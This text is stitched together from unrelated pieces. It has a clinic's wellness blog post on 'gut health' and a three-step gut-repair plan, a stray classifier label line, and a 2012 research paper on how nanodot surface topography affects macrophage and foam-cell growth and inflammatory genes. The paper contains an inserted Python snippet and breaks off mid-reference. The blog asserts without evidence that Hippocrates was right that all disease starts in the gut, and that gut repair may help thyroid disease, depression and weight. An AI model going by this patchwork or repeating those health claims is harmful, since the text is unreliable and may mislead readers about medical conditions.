What’s Up With The Gut?: why you should be concerned with gut health and what to do about it Gut health and the concept of “leaky gut” have become a hot topic these days and for good reason. Have you wondered if poor gut health could be playing a role in your life and what you can do about it? The term “gut health” has become increasingly popular, but if you feel unsure about how this affects your health or weight, you are not alone! Let’s take a close look at this trendy nutrition topic. What is gut health? The term gut health refers to the digestion and absorption of the food you eat, the integrity of your gut lining and the status of the immune systems located in your gut. The state of your gut is associated with every system in your body, including your cells, organs and numerous biochemical processes. If you can’t properly break down (digest) the food you eat and/or absorb the vital nutrients your food provides, your body will not get what it needs to maintain proper structure and function. Why does gut health matter? Hippocrates said over 2000 years ago that all disease starts in the gut and it turns out he was right! If gut health is impaired, you will not feel your best, because of the roles discussed above. Often, poor gut health is at the root of many chronic diseases. Addressing and fixing poor gut function can improve not only diseases of the GI tract such as Irritable Bowel Syndrome and Inflammatory Bowel Disease but it may also improve those that aren’t as commonly associated with your digestive system such as autoimmune conditions, thyroid disease, chronic fatigue, depression and even weight management issues. What can you do to help repair your gut health? Here are 3 simple steps to put you on the right track to supporting the gut: 1. Stop damaging the gut. The first step is to remove things that may be causing inflammation in the gut. The gut will not be able to heal if you continue to come in contact with things that promote inflammation. Consider removing or limiting the following: refined carbohydrates, added sugar, highly processed foods, artificial sweeteners, alcohol, unnecessary antibiotics, low quality supplements with additives and fillers, stress, excessive exercise, and foods with the potential to cause sensitivities or allergies. It is also important to assess for chronic gut infections that may be causing ongoing damage. This may sound like a lot, but the best way to accomplish this is to work with a Functional/Integrative Physician or Registered Dietitian who can help restore your gut health. 2. Support the gut to heal existing damage. The second step is to provide the gut with supportive foods and supplements that will help the healing process. Focus on anti-inflammatory foods like healthy fats, fermented foods, and plenty of vegetables and fruit. In addition, consider adding extra support by supplementing with a high quality probiotic, fish oil and L-glutamine. Talk to your Integrative or Functional medicine provider today for recommendations on supplement quality and dosing. 3. Continue gut healthy habits. Gut issues are not healed overnight. It takes time and consistency to see results. Trust in the process and continue to choose foods that will support a healthy gut. Follow this easy three-step process to begin healing and move you one step closer to feeling your best. If you need extra support don’t be afraid to reach out. Asking for help is a sign of strength, not weakness!
Premier Integrative Health specializes in finding and addressing the underlying causes of chronic disease. To get more information about Premier Integrative Health, visit our website by clicking here. Written by: Abby Stanley, MS RDN LD. Abby has recently joined the PIH team as a Functional Nutritionist. She is also the owner and CEO of Revive Nutrition Solutions, LLC. She loves helping others improve their health and life through nutrition and is an advocate for eating REAL food!
__label__pos
0.762775
Open Access Control of growth and inflammatory response of macrophages and foam cells with nanotopography • Mohammed Mohiuddin1, • Hsu-An Pan1, • Yao-Ching Hung2, 3 and • Guewha Steven Huang1 Nanoscale Research Letters 2012, 7:394 https://doi.org/10.1186/1556-276X-7-394 Received: 14 December 2011 Accepted: 19 April 2012 Published: 16 July 2012 Abstract Macrophages play an important role in modulating the immune function of the human body, while foam cells differentiated from macrophages with subsequent fatty streak formation play a key role in atherosclerosis. We hypothesized that nanotopography modulates the behavior and function of macrophages and foam cells without bioactive agent. In the present study, nanodot arrays ranging from 10‐ to 200‐nm were used to evaluate the growth and function of macrophages and foam cells. In the quantitative analysis, the cell adhesion area in macrophages increased with 10- to 50-nm nanodot arrays compared to the flat surface, while it decreased with 100- and 200-nm nanodot arrays. A similar trend of adhesion was observed in foam cells. Immunostaining, specific to vinculin and actin filaments, indicated that a 50-nm surface promoted cell adhesion and cytoskeleton organization. On the contrary, 200-nm surfaces hindered cell adhesion and cytoskeleton organization. Further, based on quantitative real-time polymerase chain reaction data, expression of inflammatory genes was upregulated for the 100- and 200-nm surfaces in macrophages and foam cells. This suggests that nanodots of 100‐ and 200‐nm triggered immune inflammatory stress response. In summary, nanotopography controls cell morphology, adhesions, and proliferation. By adjusting the nanodot diameter, we could modulate the growth and expression of function-related genes in the macrophages and foam cell system. The nanotopography-mediated control of cell growth and morphology provides potential insight for designing cardiovascular implants. Keywords: Cell adhesion, Nanotopography, Macrophages, Foam cell, Biocompatible, Inflammatory response Background Recent fabrication of nanostructured materials with different surface properties has generated a great deal of interest for developing implant materials, i.e., cardiovascular, dental, orthopedic, percutaneous, subcutaneous, and auditory[1–5]. The interface between nanostructured materials and biological tissues is likely to vary dependent upon the surface properties of the nanomaterial. Understanding the degree of toxicity induced by the unique cellular interaction of nanostructured materials is a major concern before utilization in biomedical applications[6–8]. Therefore, fabricating biocompatible materials which are designed to perform specific functions within living organisms has become a key component for generating nanodevices for biomedical applications, including implants. Macrophages play a critical role during innate and acquired immune responses through the phagocytosis of foreign material. During an immune response, macrophages are typically the first cell type to respond and will secrete proteins (cytokines and chemokines) in order to recruit more immune cells to the site of injury. Atherosclerosis is a pathological process that takes place in the major arteries and is the underlying cause of heart attacks, stroke, and peripheral artery disease. The earliest detectable lesions, called fatty streaks, contain macrophage foam cells that are derived from recruited monocytes. The formation of these foam cells correlates to inflammatory responses[9–11].
In particular, immune cells such as monocytes and macrophages play a key role in mediating host tissue response to implants in the foreign body reaction. One study demonstrated that the macrophage receptor with collagenous structure (MARCO) displayed limited expression in healthy cells but increased in expression around the synovial fluid following hip replacements[12]. This study indicated that the presence of a foreign body can generate an immune response, and the continued presence of the foreign body can potentially lead to macrophage buildup and production of foam cells. Recent reports have shown that microscaled landscapes are able to direct shape and migration of cultured cells. When cultured on ridges and grooves of nanoscale dimensions, cells migrate more extensively to the ridges than into the grooves. Cell shape is aligned and extended in the direction of the groove[13]. Osteoblasts grown on a fibrous matrix composed of multiwalled carbon nanofibers (100-nm in diameter) exhibit increased proliferation compared to those on flat glass surfaces[14–16]. Nanodots larger than 100-nm in diameter induced an apoptosis-like morphology for NIH-3T3 fibroblast cells[17]. Breast epithelial cells proliferate and form multicellular spheroids on interwoven polyamide fibers fabricated using electrospinning polymer solution onto a glass slide[18]. A 3-D nanofibrillar surface covalently modified with tenascin-C-derived peptides enhances neuronal growth in vitro[19]. The cardiomyoblast H9c2 shows induced cell adhesion and cytoskeleton organization on nanodot arrays smaller than 50-nm[20]. Recently, arrays of nanodots with defined diameter and depth have been fabricated using aluminum nanopores as a template during oxidation of tantalum thin films[21]. The pore size of aluminum oxide is controllable and uniformly distributed; the depth of dots depends on the voltage applied; thus, it can serve as a convenient mold to fabricate tantalum into a nanodot array of specific diameter and depth. The structure containing nanodots of uniform size could serve as a comparable nanolandscape to probe cellular response at the molecular level. Although many implant surface topographies are commercially available, there is generally a lack of detailed comparative histological studies at the nano-interface that document how these surfaces interact with living cells, in particular immune cells. In the present study, different sizes of nanodot arrays ranging from 10- to 200-nm were used to evaluate the growth and inflammatory response of macrophages and foam cells. Methods Chemicals Dulbecco’s modified Eagle medium (DMEM), FBS, antibiotics, and all other tissue culture reagents were obtained from Gibco (Life Technologies, Carlsbad, CA, USA). Glutaraldehyde and osmium tetroxide were purchased from Electron Microscopy Sciences (Hatfield, PA, USA). Anti-vinculin mouse antibody was purchased from Abcam (Cambridge, MA, USA). Alexa Fluor 594 phalloidin and Alexa Fluor 488 goat anti-mouse IgG were purchased from Invitrogen (Carlsbad, CA, USA). Trypsin was purchased from Sigma-Aldrich (St. Louis, MO, USA). CuSO4, KBr, thiobarbituric acid, trichloroacetic acid, and other commonly used chemicals were purchased from Sigma-Aldrich or Merck (Whitehouse Station, NJ, USA). Isolation of mouse peritoneal macrophages and formation of foam cells Resident peritoneal macrophages were isolated and cultured from five mice (20 g each) and were washed once with DMEM and once with DMEM containing 10% fetal bovine serum.
The cells were seeded on to different nanodot arrays, ranging from 10- to 200-nm, in DMEM containing 10% fetal bovine serum and 100 pg/ml penicillin and cultured for 3 to 4 h at 37°C in an incubator containing 5% CO2 with 90% humidity. The nonadherent cells were removed, and the monolayers were then placed in DMEM containing 10% fetal bovine serum supplemented with 100 μg/ml oxidized low-density lipoprotein (ox-LDL) or acetyl LDL; plates were further incubated for an additional 72 h. Oil red O staining Monolayers of foam cells prepared on nanodot surface were fixed with 10% formaldehyde in phosphate-buffered saline (PBS) (pH 7.4) for 10 min at room temperature, then stained with Oil Red O, and counterstained with hematoxylin for 10 min[22]. Fabrication and characterization of nanodot arrays Nanodot arrays were fabricated by anode aluminum oxide processing as described previously[21]. A tantalum nitride (TaN) thin film of 150-nm thickness was sputtered onto a 6-in. silicon wafer followed by deposition of a 3-μm-thick aluminum onto the top of a TaN layer. Anodization was carried out in 1.8 M sulfuric acid at 5 V for the 10-nm nanodot array or in 0.3 M oxalic acid at 25, 60, and 100 V for 50-, 100-, and 200-nm nanodot arrays, respectively. Porous anodic alumina was formed during the anodic oxidation. The underlying TaN layer was oxidized into tantalum oxide nanodots using the alumina nanopores as a template. The porous alumina was removed by immersing in 5% (w/v) H3PO4 overnight. The dot diameters were 15 ± 2.8-nm, 58.1 ± 5.6-nm, 95.4 ± 9.2-nm, and 211.5 ± 30.6-nm for the 10-, 50-, 100-, and 200-nm dot arrays. The average heights were 11.3 ± 2.5-nm, 51.3 ± 5.5-nm, 101.1 ± 10.3-nm, and 154.2 ± 27.8-nm, respectively. Dot-to-dot distances were 22.8 ± 4.6-nm, 61.3 ± 6.4-nm, 108.1 ± 2.3-nm, and 194.2 ± 15.1-nm, respectively. The dimension and homogeneity of nanodot arrays were measured and calculated from images taken using a JEOL JSM-6500 TFE-SEM (JEOL Ltd., Akishima, Tokyo, Japan). The cell viability assay Cells were harvested and fixed with 4% formaldehyde in PBS for 30 min followed by PBS wash for three times. The membrane was permeated by incubating in 0.1% Triton X-100 for 10 min, followed by PBS wash for three times. The sample was incubated with 4′,6-diamidino-2-phenylindole (DAPI) and phalloidin for 15 min at room temperature. The samples were mounted and imaged using a Leica TSC SP2 confocal microscope (Leica Microsystems Ltd., Milton Keynes, UK). The number of viable cells was counted using ImageJ software (National Institutes of Health, Bethesda, MA, USA) and expressed in terms of cell density. Scanning electron microscopy The harvested cells were fixed with 1% glutaraldehyde in PBS at 4°C for 20 min, followed by post-fixation in 1% osmium tetroxide for 30 min. Dehydration was performed through a series of ethanol concentrations (10-min incubation each in 50%, 60%, 70%, 80%, 90%, 95%, and 100% ethanol) and air-dried. The specimen was sputter-coated with platinum and examined using a JEOL JSM-6500 TFE-SEM at an accelerating voltage of 5 keV. Immunostaining Cells were harvested and fixed with 4% paraformaldehyde in PBS for 15 min followed by PBS wash for three times. Cell membrane was permeated by incubating in 0.1% Triton X-100 for 10 min, followed by PBS wash for three times, and blocked by 1% bovine serum albumin (BSA) in PBS for 1 h and PBS wash for three times. 
The sample was incubated with anti-vinculin antibody (properly diluted in 1% BSA) and phalloidin for 1 h, followed by incubation with Alexa Fluor 488 goat anti-mouse antibody for 1 h, and then followed by PBS wash for three times. Samples were mounted and imaged using a Leica TSC SP2 confocal microscope. Quantitative real-time RT-PCR Total RNA was extracted from macrophages and foam cells using TRI-reagent (Talron Biotech, Rehovot, Israel) according to the manufacturer’s specifications. The RNA was isolated using chloroform extraction and isopropanol precipitation. The crude RNA extract was immediately purified with an RNeasy Mini Kit (Qiagen, Venlo, Netherlands) to remove impurities and unwanted organics. Purified RNA was resuspended in DEPC water and quantified by OD260. The OD260 to OD280 ratio usually exceeded 2.0 at this stage. For cDNA synthesis, 1 μg of total RNA was annealed with 1 μg of oligo-dT primer, followed by reverse transcription using SuperScript® III Reverse Transcriptase (Invitrogen, Carlsbad, CA, USA) in a total volume of 50 μl. Between 0.2 and 0.5 μl of the reverse transcription reactions was used for quantitative polymerase chain reaction (qPCR) using SYBR Green I on an iCycler iQ5 (Bio-Rad Laboratories, Hercules, CA, USA). Cycling conditions were as follows: 1× (5 min at 95°C) and 50× (20 s at 95°C, 20 s at 55°C, and 40 s at 72°C). Fluorescence was measured after each 72°C step. Expression levels were obtained as threshold cycles (Ct), which were determined by the iCycler iQ Detection System software (Bio-Rad Laboratories, Hercules, CA, USA). Relative transcript quantities were calculated using the ΔΔCt method. Glyceraldehyde-3-phosphate dehydrogenase (GAPDH) was used as a reference gene and was amplified from the same cDNA samples. The difference in threshold cycles between the sample mRNA and the GAPDH mRNA was defined as ΔCt. The difference between the ΔCt of the untreated (flat-surface) control and the ΔCt of the nanodot-cultured sample was defined as ΔΔCt. The fold change in mRNA expression was expressed as 2^ΔΔCt. The results were expressed as the mean ± standard deviation (SD) of six experiments. Results and discussion Nanotopography-modulated morphology and cell spread of macrophages and foam cells To characterize how the macrophages and foam cells interact with the aforementioned nanodot arrays, the cells were cultured for 72 h on nanodot arrays of different diameters including flat substrate as a control. The morphological appearance of adhered cells was imaged by both optical image microscopy and scanning electron microscopy (SEM) (Figures 1 and 2). Macrophages and foam cells grown on the flat surface and 10-nm nanodot arrays exhibited flat and extended conformation during the course of 3 days. Cells grown on the 50-nm nanodot arrays showed more extended morphology than those on the flat surface with apparently larger surface area for each cell. Cells grown on the 100-nm nanodot arrays exhibited a distorted morphology with shrinking surface area and increased length of lamellipodia. Apoptosis-like appearance and reduction in surface area with extended lamellipodia were seen with cells seeded on the 200-nm nanodot arrays. Figure 1 Macrophage and foam cell morphology changes with topographical surface. Macrophages and foam cells were grown on flat, 10-, 50-, 100-, and 200-nm nanodot arrays for 3 days, stained with Oil Red O, and counterstained by hematoxylin (the arrows in foam cells indicate engulfed lipoproteins). Morphology was imaged by optical microscopy.
Scale bar = 50 μm. Figure 2 Morphology of macrophages cultured on nanodot arrays. Macrophages were grown on flat, 10-, 50-, 100-, and 200-nm nanodot arrays for 3 days, and their morphology was imaged by scanning electron microscopy. Scale bar for low-mag = 10 μm and for high-mag = 1 μm. Formation of focal adhesions reflected by the attachment of filopodia and lamellipodia to the substratum indicates healthy growth for cultured cells. SEM images showed that the lamellar body of migrating cells, seeded on 50-nm nanodot arrays, exhibited wide and thick characters with a large number of filopodia (Figure2). Cells seeded on flat and 10-nm nanodot arrays showed comparable lamellipodia. However, the cells seeded on 100- and 200-nm nanodot arrays were mounted with extended length and narrow-size lamellipodia. Figure3a shows the correlation between cell spread area and dot size for macrophages and foam cells . Cell surface area representing the percent adhesion area of viable cells relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. Based on quantitative analysis, the cell spread area of macrophages increased significantly between 21.6% and 37.9% with increasing dot sizes of 10- to 50-nm, respectively. Interestingly, as dot diameter increased from 100- to 200-nm, there was a significant reduction in cell surface area of 22.7% and 43.2%, respectively. A similar biphasic trend, increasing cell surface area from 10- to 50-nm and decreasing from 100- to 200-nm, was observed with foam cells. This trend of change correlated with qualitative analysis as shown in Figure1. Although the precise reason for such differential growth pattern is not known, since increasing the dot diameter above 100-nm stimulates an apoptosis-like growth and a significant reduction in the surface area, these results demonstrate that nanodot arrays larger than 100-nm are less biocompatible to cells. Figure 3 Nanotopography-dependent cell spreading area, focal adhesion, and cell density. Macrophages and foam cells seeded on nanodot arrays of various sizes were harvested after a 3-day culture. (a) Cell spread area versus dot diameter for cells cultured on the nanodot arrays. The viable cells were counted, and the percent adhesion area relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. (b) Focal adhesions (amount of vinculin staining) versus dot diameters for cells cultured on nanodot arrays. The amount of vinculin staining per cell was measured, and the percentage of focal adhesion relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. (c) Cell density versus dot diameter for cells cultured on the nanodot arrays. The viable cells were counted, and percent viability relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. The mean ± SD from at least three experiments is shown. Asterisk denotes p < 0.005 when compared to the flat control surface. Nanotopography-modulated cell adhesion and cytoskeleton organization of macrophages and foam cells To evaluate cell adhesion and cytoskeleton reorganization, immunostaining specific to vinculin and actin filaments was performed on nanodot arrays (Figure4). The amount of vinculin staining in foam cells was significantly less than that in macrophages for all nanodot sizes. Foam cells had fewer focal adhesion molecules than macrophages when grown on nanodot arrays and might have the destiny of apoptosis. 
Vinculin staining was well distributed for macrophages grown on the flat surface and on the 10- to 100-nm nanodot arrays, with the highest density of vinculin for cells grown on 50-nm nanodot arrays. Nevertheless, the amount of vinculin staining decreased for cells grown on 200-nm nanodot arrays (Figure4). For foam cells, vinculin staining had the same trend as that for macrophages: increasing from flat to 50-nm nanodot arrays, becoming gradually lost for cells grown on 100-nm nanodot arrays, and completely disappearing for 200-nm nanodot arrays. Figure 4 Immunostaining showing distribution of vinculin (green) and actin filaments (red) in macrophages and foam cells. Macrophages and foam cells were seeded on flat, 10-, 50-, 100-, and 200-nm nanodot arrays for 3 days, and their morphology was observed by confocal microscopy. Scale bar = 25 μm. Immunostaining of actin filaments indicated a well-organized cytoskeleton in macrophages grown on flat, 10-, and 50-nm nanodot arrays, but it is gradually lost for 100-nm nanodot arrays and has completely disappeared for 200-nm nanodot arrays. For foam cells, cytoskeleton arrangement had the same trend as macrophages: increasing from flat to 50-nm nanodot arrays, becoming gradually lost for cells grown on 100-nm nanodot arrays, and completely disappearing for 200-nm nanodot arrays. Immunostaining indicated that nanodot arrays in the range of 10- to 100-nm promoted cell adhesion and cytoskeleton organization for macrophages and foam cells (Figure3b). Best adhesion occurred at 50-nm nanodots, whereas nanodots of 200-nm retarded the formation of focal adhesions and inhibited the organization of the cytoskeleton. Nanotopography-modulated cell density To evaluate the viability of macrophages and foam cells on varied nanodot arrays, cells were seeded on nanodot arrays, ranging from 10- to 200-nm including flat control. Macrophages and foam cells were cultured for 72 h, and then, DAPI staining was performed to verify viable cells on each nanodot array and flat surface (Figure3c). For macrophages, compared to the flat surface, there were 10.6%, 149.1%, and 26.5% increases in the number of viable cells for 10-, 50-, and 100-nm nanodot arrays, respectively, but 41.2% reduction was observed on 200-nm nanodot arrays. For foam cells, a 110% increase in the number of viable cells was observed for 50-nm nanodot arrays, and 28.6% reduction occurred for 200-nm nanodot arrays. Effect of nanotopography on the expression of genes related to inflammation and circulatory repair The cytokine gene expression profiles related to inflammation of macrophages and foam cells cultured on nanodot arrays were measured at 72 h, using qPCR. The cytokines examined were TNF-α, IL-6, IL-10, CCL-2, and CCL-3 (Figure5a,b). In addition, genes important for the development of the circulatory system and repair were also evaluated (Figure5c,d): PAI-1, VEGF, and PECAM. Figure 5 Changes in cytokine and chemokine gene expression profiles. (a) Macrophages and (b) foam cells were cultured on nanodot arrays of different sizes for 72 h, and qPCR was conducted to evaluate gene expression of TNF-α, IL-6, CCL-3, IL-10, and CCL-2. Gene expression profiles for genes were involved in circulatory repair. (c) Macrophages and (d) foam cells were cultured on nanodot arrays of different sizes for 72 h, and qPCR was conducted to evaluate gene expression of PAI-1, VEGF and PECAM. 
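To make the relative quantification behind these fold changes concrete, the ΔΔCt calculation described in the qPCR Methods can be sketched in a few lines of Python. This is only an illustration of the arithmetic, not the authors' analysis code: the function name and the Ct values below are invented for the example.

def fold_change(ct_target_sample, ct_gapdh_sample, ct_target_control, ct_gapdh_control):
    # ΔCt: target gene Ct normalized to the GAPDH reference within the same sample
    d_ct_sample = ct_target_sample - ct_gapdh_sample
    d_ct_control = ct_target_control - ct_gapdh_control
    # ΔΔCt as defined in the Methods: control ΔCt minus nanodot-sample ΔCt
    dd_ct = d_ct_control - d_ct_sample
    # fold change in expression relative to the flat control
    return 2 ** dd_ct

# hypothetical Ct values for TNF-α on a 50-nm array versus the flat control
print(fold_change(22.0, 18.0, 24.3, 18.0))  # ~4.9, i.e. roughly a five-fold increase

Values greater than 1 indicate up-regulation relative to the flat surface, which is how the topography-induced expression changes in Figure 5 are reported.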
TNF-α is a pro-inflammatory cytokine and is responsible for activation and positive regulation of the NFκB pathway, which is a key regulator of the immune response[23]. There was a five-fold increase in TNF-α found at 50-nm nanodot arrays in macrophages, while a five- to six-fold increase was demonstrated in foam cells at 50- to 100-nm nanodot arrays (Figure5a,b). Similarly, IL-6 encodes a pro-inflammatory cytokine that is critical for activating an acute inflammatory response and is responsible for recruiting adaptive immune cells to the site of injury or infection. There was a significant three-fold increase of IL-6 in macrophages cultured on 200-nm nanodot arrays, while there was about a one-fold increase at 50- to 100-nm nanodot arrays. In contrast, the foam cells responded differently than the macrophages, with a three- to five-fold increase of IL-6 when cultured on 10- to 100-nm nanodot arrays and a two-fold increase for 200-nm nanodot arrays. In comparison, IL-10 is an anti-inflammatory cytokine responsible for blocking the synthesis of pro-inflammatory cytokines and negatively regulates NFκB activation. There was an increasing trend of IL-10 gene expression in the macrophages and the foam cells (Figure5a,b). For the CCL-2 chemokine, which functions to recruit monocytes and other immune cells, there was no significant change in any of the macrophage topography conditions. However, in foam cells, there was a 2.5-fold increase at 200-nm nanodot arrays, while there was less than one-fold increase at 10- to 100-nm nanodot arrays (Figure5b). Another common chemokine is CCL-3. This protein is responsible for recruiting and activating leukocytes to aid in an immune response. Figure5a showed less than 1% increase in CCL-3 in macrophages at 10- to 200-nm nanodot arrays, while a six-fold increase at 200-nm nanodot arrays in foam cells was observed (Figure5b). In addition to the immune response, genes associated with circulatory repair were also investigated. PAI-1 is a gene involved in the prevention of blood clots. There was a five-fold increase in PAI-1 observed at 200-nm nanodot arrays in macrophages (Figure5c), whereas foam cells displayed an inconsistent pattern of increase of PAI-1 (Figure5d). Furthermore, VEGF is known to play a key role in the creation of new blood vessels during development as well as repair during injury. There was an inconsistent increase in VEGF for the macrophages, while foam cells demonstrated a significant increase at the 50-nm topography (Figure5d). PECAM is responsible for removing old neutrophils from the site of injury and preventing buildup of immune cell debris. In the macrophages, there was no change in PECAM genes; however, the foam cells displayed significant increases for the 50- to 200-nm topographies. In summary, the differences in relative gene expressions shown here are topography induced and normalized to flat surface. When evaluating the gene expression trends observed in the macrophages, there was a highly significant increase in TNF-α expression for the 50-nm topography. For all of the topographies, there was limited impact on the expression of CCL-3 and CCL-2, whereas, there was a mild elevation in IL-6 expression. Taken together, there was a limited induction of an inflammatory response for these topographies. The expression of PAI-1, VEGF, and PECAM were also evaluated, and there were low levels of expression for all genes in all topographies except for the 200-nm topography, which displayed significant increases in PAI-1 expression. 
Since PAI-1 helps to prevent blood clots and the buildup of cells, in conjunction with data from the gene expression studies where limited immune responses were observed, the 200-nm topography might assist in the prevention of foam cell formation. When evaluating the foam cells directly, there were high levels of the early-response pro-inflammatory cytokines IL-6 and TNF-α for the 50- and 100-nm topographies with mild increases in expression for the 10- and 200-nm topographies. Furthermore, the 200-nm topography demonstrated high levels of expression for the pro-inflammatory cytokine CCL-3. In addition, when the circulatory repair genes were assessed, the 100-nm topography demonstrated a significant increase in the PECAM gene which functions to remove leukocyte debris from cells. Since foam cells are derived from macrophages that are not cleared from the system, this 100-nm topography could greatly aid in the prevention or removal of foam cells from the body. After 72 h, macrophages showed an increase in inflammatory gene expression on 10- and 200-nm nanodot arrays, while the difference was not significant compared to the flat. Foam cells showed the most inflammatory gene expression on 200-nm nanodot arrays. The common acute inflammation gene expression of CCL-3 responded significantly to the topography of 100- and 200-nm nanodot arrays for foam cells. However, the macrophages showed the most acute inflammation on the 10-nm nanodot arrays. Thus, the topographical effect on the PAI-1 gene expression was difficult to discern. Recently, it has been shown that three-dimensional surface topography (size, shape, and surface texture) is one of the most important parameters that influence cellular reactions[24, 25]. Other studies have demonstrated that the difference in cellular response correlates with a modulation of the concentration of serum proteins on the surface[26, 27]. Many studies have shown that cell biomaterial interactions can activate macrophages which results in the synthesis of pro-inflammatory agents such as TNFα, IFNγ, IL-1, and IL-6[28, 29] Most likely, the surface properties, such as material surface chemistry and topography, can modulate the expression of pro-inflammatory cytokines and chemokines by macrophages in a time-dependent manner[30]. Although many studies have investigated cellular reaction to different surface patterns, the behavior of immune cells, such as macrophages and foam cells, cultured on different diameters of nanodots has not been studied thoroughly. Our study suggests that topography may modulate the phenotypes of macrophages and foam cells in the context of foreign body response. The response to topography in the form of nanodot arrays in the range of 10- to 200-nm has revealed a distinctive pattern, and topography indeed affects cell morphology, density, adhesion, and cytokine expression compared to flat controls. The changes in cell morphology are observed in four different sizes of nanodot arrays, indicating that the findings in this study are topography-mediated. Using topography-induced change in macrophages and foam cell behavior, it is possible to influence phenotypic response, such as cell activation, motility, and maturation in the foreign body response. While there is a mild induction of the inflammatory response for the 100- and 200-nm topographies, these growth conditions also supported expressions of genes that would be responsible in the prevention of foam cell formation and the removal of foam cells, suggesting potential benefits. 
Furthermore, it might be possible to treat the cells with antioxidants or other anti-inflammatory mediators to prevent the inflammatory response while benefiting from the increase in PAI-1 and PECAM. Conclusion We have shown topologic modulation of cell growth, cell density, cell spreading area, and immune functions. Our results demonstrated that 50-nm nanodots displayed a biocompatible surface compared to 100- and 200-nm nanodots in terms of macrophage and foam cell growth. In addition, based on qPCR data, 100- and 200-nm surface-induced inflammatory gene expression in macrophages and foam cells suggest that nanostructured materials (100- and 200-nm) trigger the immune inflammatory stress response. The role of topography in modulating implant tissue reaction would require further elucidation. This study suggests that nanotopography may be beneficial for the design of cardiovascular implants. Authors’ information MM and HAP are doctoral degree students at the Department of Material Science and Engineering, National Chiao Tung University. GSH is a professor at the Department of Material Science and Engineering, National Chiao Tung University. YCH is a professor at the Department of Obstetrics and Gynecology, China Medical University and Hospital and also professor at the College of Medicine, China Medical University. Declarations Acknowledgment This study was supported in part by the National Science Counsel Grant 100-2923-B-009-001-MY3 and by the ‘Aim for the Top University Plan of the National Chiao’ Tung University and Ministry of Education, Taiwan, R.O.C. Authors’ Affiliations (1) Department of Material Science and Engineering, National Chiao Tung University (2) Section of Gynecologic Oncology, Department of Obstetrics and Gynecology, China Medical University and Hospital (3) College of Medicine, China Medical University References 1. Hosseinkhani H, Hosseinkhani M, Hattori S, Matsuoka R, Kawaguchi N: Micro and nano-scale in vitro 3D culture system for cardiac stem cells. J Biomed Mater Res A 2010, 94A: 1–8.View ArticleGoogle Scholar 2. Kriparamanan R, Aswath P, Zhou A, Tang L, Nguyen KT: Nanotopography: cellular responses to nanostructured materials. J Nanosci Nanotechnol 2006, 6: 1905–1919.View ArticleGoogle Scholar 3. Latysh V, Krallics G, Alexandrov I, Fodor A: Application of bulk nanostructured materials in medicine. Curr Appl Phys 2006, 6: 262–266.View ArticleGoogle Scholar 4. Wood MA: Colloidal lithography and current fabrication techniques producing in-plane nanotopography for biological applications. J R Soc Interface 2007, 4: 1–17.View ArticleGoogle Scholar 5. Buxton DB: Current status of nanotechnology approaches for cardiovascular disease: a personal perspective. Wiley Interdiscip Rev Nanomed Nanobiotechnol 2009, 1: 149–155.View ArticleGoogle Scholar 6. Hussain SM, Braydich-Stolle LK, Schrand AM, Murdock RC, Yu KO, Mattie DM, Schlager JJ, Terrones M: Toxicity evaluation for safe use of nanomaterials: recent achievements and technical challenges. Adv Mater 2009, 21: 1549–1559.View ArticleGoogle Scholar 7. Hussain SM, Schlager JJ: Safety evaluation of silver nanoparticles: inhalation model for chronic exposure. Toxicol Sci 2009, 108: 223–224.View ArticleGoogle Scholar 8. Schaeublin NM, Braydich-Stolle LK, Schrand AM, Miller JM, Hutchison J, Schlager JJ, Hussain SM: Surface charge of gold nanoparticles mediates mechanism of toxicity. Nanoscale 2011, 3: 410–420.View ArticleGoogle Scholar 9. Kruth HS: Macrophage foam cells and atherosclerosis. 
Front Biosci 2001, 6: D429-D455.View ArticleGoogle Scholar 10. Lucas AD, Greaves DR: Atherosclerosis: role of chemokines and macrophages. Expert Rev Mol Med 2001, 3: 1–18.View ArticleGoogle Scholar 11. Persson J, Nilsson J, Lindholm MW: Cytokine response to lipoprotein lipid loading in human monocyte-derived macrophages. Lipids Health Dis 2006, 5: 17.View ArticleGoogle Scholar 12. Zhao DS, Ma GF, Selenius M, Salo J, Pikkarainen T, Konttinen YT: Ectopic expression of macrophage scavenger receptor MARCO in synovial membrane-like interface tissue in aseptic loosening of total hip replacement implants. J Biomed Mater Res A 2010, 92A: 641–649.Google Scholar 13. Baker BM, Nathan AS, Gee AO, Mauck RL: The influence of an aligned nanofibrous topography on human mesenchymal stem cell fibrochondrogenesis. Biomaterials 2010, 31: 6190–6200.View ArticleGoogle Scholar 14. Elias KL, Price RL, Webster TJ: Enhanced functions of osteoblasts on nanometer diameter carbon fibers. Biomaterials 2002, 23: 3279–3287.View ArticleGoogle Scholar 15. Lobo AO, Antunes EF, Palma MB, Pacheco-Soares C, Trava-Airoldi VJ, Corat EJ: Monolayer formation of human osteoblastic cells on vertically aligned multiwalled carbon nanotube scaffolds. Cell Biol Int 2010, 34: 393–398.View ArticleGoogle Scholar 16. Zanello LP, Zhao B, Hu H, Haddon RC: Bone cell proliferation on carbon nanotubes. Nano Lett 2006, 6: 562–567.View ArticleGoogle Scholar 17. Pan HA, Hung YC, Su CW, Tai SM, Chen CH, Ko FH, Steve Huang G: A nanodot array modulates cell adhesion and induces an apoptosis-like abnormality in NIH-3T3 cells. Nanoscale Res Lett 2009, 4: 903–912.View ArticleGoogle Scholar 18. Schindler M, Ahmed I, Kamal J, Nur EKA, Grafe TH, Young Chung H, Meiners S: A synthetic nanofibrillar matrix promotes in vivo-like organization and morphogenesis for cells in culture. Biomaterials 2005, 26: 5624–5631.View ArticleGoogle Scholar 19. Ahmed I, Liu HY, Mamiya PC, Ponery AS, Babu AN, Weik T, Schindler M, Meiners S: Three-dimensional nanofibrillar surfaces covalently modified with tenascin-C-derived peptides enhance neuronal growth in vitro. J Biomed Mater Res A 2006, 76: 851–860.View ArticleGoogle Scholar 20. Pan HA, Hung YC, Sui YP, Huang GS: Topographic control of the growth and function of cardiomyoblast H9c2 cells using nanodot arrays. Biomaterials 2012, 33: 20–28.View ArticleGoogle Scholar 21. Wu CT, Ko FH, Hwang HY: Self-aligned tantalum oxide nanodot arrays through anodic alumina template. Microelectron Eng 2006, 83: 1567–1570.View ArticleGoogle Scholar 22. Schwartz CJ, Ghidoni JJ, Kelley JL, Sprague EA, Valente AJ, Suenram CA: Evolution of foam cells in subcutaneous rabbit carrageenan granulomas: I. Light-microscopic and ultrastructural study. Am J Pathol 1985, 118: 134–150.Google Scholar 23. Baldwin AS Jr: The NF-kappa B and I kappa B proteins: new discoveries and insights. Annu Rev Immunol 1996, 14: 649–683.View 